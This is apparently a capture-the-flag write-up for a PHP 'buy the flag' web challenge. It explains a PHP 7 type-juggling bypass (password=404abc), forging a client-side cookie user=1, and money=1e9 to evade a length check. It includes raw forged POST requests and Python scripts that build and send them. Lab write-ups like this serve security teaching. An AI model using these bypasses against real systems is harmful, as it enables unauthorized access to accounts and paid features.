Approach
The challenge title hints at buying a flag. Opening the target shows a front-end with nothing useful on it. The payflag link in the top-right corner matches the challenge name, so open that page:
Flag need your 100000000 money
If you want to buy the FLAG:
You must be a student from CUIT!!!
You must be answer the correct password!!!
Only Cuit's students can buy the FLAG
To sum up the hints: you must pay the specified amount, supply the correct password, and be a student from CUIT.
The hints make it fairly obvious that the request has to be modified and an identity forged, but a lot is still unknown. Viewing the page source reveals the following:
<!--
~~~post money and password~~~
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (is_numeric($password)) {
echo "password can't be number</br>";
}elseif ($password == 404) {
echo "Password Right!</br>";
}
}
-->
So the data is submitted via POST, and password must not be numeric (is_numeric() rejects it) yet must still equal 404. This is a classic loose comparison: in PHP 7 and earlier, when a string is compared with an integer using ==, the string is converted to a number by taking its leading numeric prefix. So password=404abc passes the is_numeric() check and still compares equal to 404. Note that this only holds before PHP 8.0: since PHP 8, an integer compared with a non-numeric string is cast to a string first, so 404 == "404abc" is false and this bypass no longer works.
Intercept the request and try forging it directly:
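To make the type-juggling argument concrete, here is an added example (not part of the original writeup) that reimplements the commented-out password check in Python with an emulation of PHP's numeric-string rules for both PHP 7 and PHP 8, so candidate passwords can be tested offline before touching the target. It also covers the money step later in the writeup: the shape of that check (a cap on the string length followed by a numeric comparison) is an assumption, since the page only shows its error message, and the length cap is a parameter rather than a known value.

```python
import re

# PHP's numeric-string grammar: optional leading whitespace, optional sign,
# decimal digits with an optional fraction, optional exponent. Hex is not
# numeric (since PHP 7). Trailing whitespace is accepted only from PHP 8.0.
_WS = r"[ \t\n\r\v\f]*"
_NUM = r"[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?"
_NUMERIC_PHP7 = re.compile(rf"{_WS}{_NUM}")
_NUMERIC_PHP8 = re.compile(rf"{_WS}{_NUM}{_WS}")
_LEADING_NUM = re.compile(rf"{_WS}({_NUM})")


def is_numeric(s, php8=False):
    """Emulates PHP is_numeric() for a string argument (fullmatch, so a
    trailing newline does not sneak past as it would with '$')."""
    pat = _NUMERIC_PHP8 if php8 else _NUMERIC_PHP7
    return pat.fullmatch(s) is not None


def leading_number(s):
    """The numeric prefix PHP 7 uses when coercing a string for ==:
    '404abc' -> 404.0, 'abc' -> 0.0."""
    m = _LEADING_NUM.match(s)
    return float(m.group(1)) if m else 0.0


def loose_eq(n, s, php8=False):
    """PHP `$n == $s` for an int $n and a string $s."""
    if php8:
        # PHP 8: numeric strings compare as numbers; anything else makes PHP
        # cast the int to a string and compare strings, so "404abc" != 404.
        if is_numeric(s, php8=True):
            return float(s.strip(" \t\n\r\v\f")) == n
        return str(n) == s
    # PHP 7: the string is coerced via its leading numeric prefix.
    return leading_number(s) == n


def password_gate(password, php8=False):
    """The check from the page source, reimplemented: returns the message
    pay.php would echo, or None when neither branch fires."""
    if is_numeric(password, php8):
        return "password can't be number"
    if loose_eq(404, password, php8):
        return "Password Right!"
    return None


def money_fits(money, max_len, minimum=100000000):
    """ASSUMED shape of the money check (the page shows only its error text):
    a cap on the submitted string's length, then a numeric comparison.
    '1e9' is a numeric string in every PHP version, so it stays short yet
    compares as 1000000000."""
    if len(money) > max_len:
        return "Nember lenth is too long"
    if is_numeric(money) and float(money) >= minimum:
        return "ok"
    return "not enough money"


if __name__ == "__main__":
    for cand in ("404", "404abc", "404 ", " 404", "abc"):
        print(f"{cand!r:10} PHP7: {password_gate(cand)!s:26} "
              f"PHP8: {password_gate(cand, php8=True)}")
    for cand in ("1000000000", "1e9", "1e7"):
        print(f"{cand!r:14} {money_fits(cand, max_len=7)}")  # 7 is an assumed cap
```

Running the script shows that 404abc (and a trailing-space variant such as "404 ") only passes under PHP 7 semantics; under PHP 8 no non-numeric string can loosely equal 404, so a target running PHP 8 would need a different approach.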
POST /pay.php HTTP/1.1
Host: 5b8c9b81-bda5-47c5-80f3-e847fde56de0.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1, i
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 32
Cookie: user=0
Content-Type: application/x-www-form-urlencoded
password=404abc&money=1000000000
Note that when the GET request is changed to a POST, the following header must be added, otherwise the server will not parse the form body (and $_POST stays empty):
Content-Type: application/x-www-form-urlencoded
Sending the forged request still returns:
Only Cuit's students can buy the FLAG</br>
The identity has not been forged yet. Looking at the response, it contains the following response header (not a request header):
Set-Cookie: user=0
This header makes the browser store the cookie user=0. Since 0 generally means false, this is probably where our identity is being rejected: the server is trusting a client-controlled cookie as its authorization flag. Change it to 1 (true) and resend:
POST /pay.php HTTP/1.1
Host: 5b8c9b81-bda5-47c5-80f3-e847fde56de0.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1, i
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 32
Cookie: user=1
Content-Type: application/x-www-form-urlencoded
password=404abc&money=1000000000
Response:
<p>
you are Cuiter</br>Password Right!</br>Nember lenth is too long</br>
</p>
The number is too long, which must refer to the money value. Use exponent notation: 1e9 is only three characters, but it is still a numeric string in PHP, so it compares numerically as 1000000000 (which is at least 100000000) while staying under the length limit:
POST /pay.php HTTP/1.1
Host: 5b8c9b81-bda5-47c5-80f3-e847fde56de0.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1, i
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 25
Cookie: user=1
Content-Type: application/x-www-form-urlencoded
password=404abc&money=1e9
Flag obtained.
Summary
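The three manual requests above boil down to one POST with the right Content-Type, a forged user=1 cookie, and a short numeric money value. The script below is an added example, not part of the original writeup, that builds and sends that request with the standard library; the hostname is a placeholder to be replaced with the live instance, and Content-Length is computed from the body so it cannot drift from the payload the way a hand-edited request can.

```python
import http.client
from urllib.parse import urlencode

# Placeholder target: the instance hostname on the page is ephemeral (assumption).
TARGET_HOST = "example.invalid"
TARGET_PORT = 81
PATH = "/pay.php"


def build_form(password="404abc", money="1e9"):
    """Form body for pay.php: a non-numeric string that PHP 7 still coerces to
    404, and a three-character money value that compares as 1000000000."""
    return urlencode({"password": password, "money": money})


def build_raw_request(host, path, body, user_cookie="1"):
    """Raw HTTP/1.1 POST in the form you would paste into a repeater.
    Content-Type is required or $_POST stays empty; Cookie carries the forged
    identity flag; Content-Length is derived from the actual body."""
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode())}",
        f"Cookie: user={user_cookie}",
        "Connection: close",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def buy_flag(host=TARGET_HOST, port=TARGET_PORT, user_cookie="1", timeout=10):
    """Send the forged POST and return (status, decoded body)."""
    body = build_form()
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", PATH, body=body, headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": f"user={user_cookie}",
        })
        resp = conn.getresponse()
        return resp.status, resp.read().decode(errors="replace")
    finally:
        conn.close()


if __name__ == "__main__":
    print(build_raw_request(TARGET_HOST, PATH, build_form()))
    status, text = buy_flag()
    print(status)
    print(text)
```

Because the cookie is the only thing standing in for authentication, any client can set user=1; a server that needs to remember "this visitor is a CUIT student" should keep that in a server-side session or a signed token rather than a bare cookie value.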
A fairly basic forgery challenge. The cookie part was a bit of a trap; I tried quite a few forgeries, and it turned out that just changing the cookie was enough...